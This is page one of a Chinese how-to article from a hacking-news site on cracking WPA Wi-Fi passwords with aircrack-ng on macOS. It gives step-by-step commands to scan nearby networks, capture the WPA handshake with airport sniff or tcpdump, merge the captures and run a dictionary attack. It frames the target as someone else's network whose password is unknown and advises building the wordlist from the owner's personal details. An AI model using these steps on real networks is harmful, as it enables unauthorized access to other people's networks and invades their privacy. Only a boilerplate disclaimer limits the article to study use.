欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Wifi安全与Aircrack-ng

来源:本站整理 作者:佚名 时间:2015-03-03 TAG:Aircrack 我要投稿

1 前言

前几天用aircrack-ng结合密码字典破解wifi密码成功过,整理资料做个笔记。

一开始我准备在kali-linux虚拟机里面弄,后来发现由于虚拟机里面没有支持无线网卡,于是作罢;这里只记录在Mac平台上进行整个过程,对于Linux部分参考末尾的资料链接.

2 Kali-linux

Kali Linux是一个高级渗透测试和安全审计Linux发行版,是BackTrack Linux完全遵循Debian开发标准的完整重建.

3 Aircraft-ng

Aircrack-ng是一款用于破解无线802.11WEP及WPA-PSK加密的工具,该工具在2005年11月之前名字是Aircrack,在其2.41版本之后才改名为Aircrack-ng.

组件列表:

组件名称 描 述
aircrack-ng 用于WEP及WPA-PSK密码的恢复,只要airodump-ng收集足够数据包,就可以自动检测数据包破解
airmon-ng 用于改变无线网卡工作模式,以便其他工具的顺利使用
airodump-ng 用于捕获802.11数据报文,以便于aircrack-ng破解
aireplay-ng 在进行WEP及WPA-PSK密码恢复时,可以根据需要创建特殊的无线网络数据报文及流量
airserv-ng 可以将无线网卡连接至某一特定端口,为攻击时灵活调用做准备
airolib-ng 进行WPA Rainbow Table攻击时使用,用于建立特定数据库文件
airdecap-ng 用于解开处于加密状态的数据包
tools 其他用于辅助的工具,如airdriver-ng、packetforge-ng等

3.1 断开网络连接

一般假设,此时电脑能查看到wifi,但苦于不知道密码,于是进行后续操作获得wifi密码.

如果已经联网,则断开网络:

$ airport -z

3.2 查看网络接口列表

$ airport -s

  SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
  HOME xx:xx:xx:xx:xx:xx -81  4,+1    Y  -- WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)
Tea_7D xx:xx:xx:xx:xx:xx -74  2,+1    Y  -- WPA(PSK/AES/AES)
  HAHA xx:xx:xx:xx:xx:xx -81  1,+1    Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
  hsu_ xx:xx:xx:xx:xx:xx -85  11,-1   Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
  vhao xx:xx:xx:xx:xx:xx -83  11,-1   Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
  CREC xx:xx:xx:xx:xx:xx -82  11,-1   Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
  illi xx:xx:xx:xx:xx:xx -75  11,-1   Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
IN_19C xx:xx:xx:xx:xx:xx -84  6,+1    Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
IN_16E xx:xx:xx:xx:xx:xx -82  6       N  -- WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)

3.3 监听网卡并获取握手数据包

$ airport sniff 6

这条命令经过一段时间后Ctrl+C停止后,会在/tmp/生成一个*.cap数据包文件。

也可以使用tcpdump来获取数据包:

# capture a beacon frame from the AP
$ tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c channel-num -i en0 -w beacon.cap
# wait for the WPA handshake
$ tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w eapol.cap

这条命令等到 Get 4 后停止(事实上,未必能拿到握手包),然后获取到数据包文件,可以将两个数据包文件合并:

$ mergecap -a -F pcap -w handshake.cap beacon.cap eapol.cap

3.4 破解密码

aircrack-ng tmp-01.cap -w /tmp/passwd.txt

此时,你需要一个足够大的词典,结合wifi主人的个人信息,提高破解的效率。

3.5 可能遇到问题

 

3.5.1 Wireless tools not found

和无线相关的软件包:

iw - tool for configuring Linux wireless devices
kali-linux-wireless - Kali Linux wireless tools
kannel-docs - WAP and SMS gateway documentation
kismet - wireless sniffer and monitor - core
kismet-plugins - wireless sniffer and monitor - plugins
libiw-dev - Wireless tools - development files
libiw30 - Wireless tools - library
linux-wlan-ng - utilities for wireless prism2 cards
mdk3 - Wireless attack tool for IEEE 802.11 networks

安装软件包:

$ sudo apt-get install kali-linux-wireless

这个问题在Mac平台目前没有解决,查到的资料都说此平台不支持,导致airmon-ng等命令无法使用.

3.5.2 Kali-linux没有网卡

是Kali的虚拟机吗?如果是,除非你的是USB网卡,否则不可用(VMWare/VirtualBox/QEMU会虚拟每个PCI硬件).USB网卡连到虚拟机了吗?

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载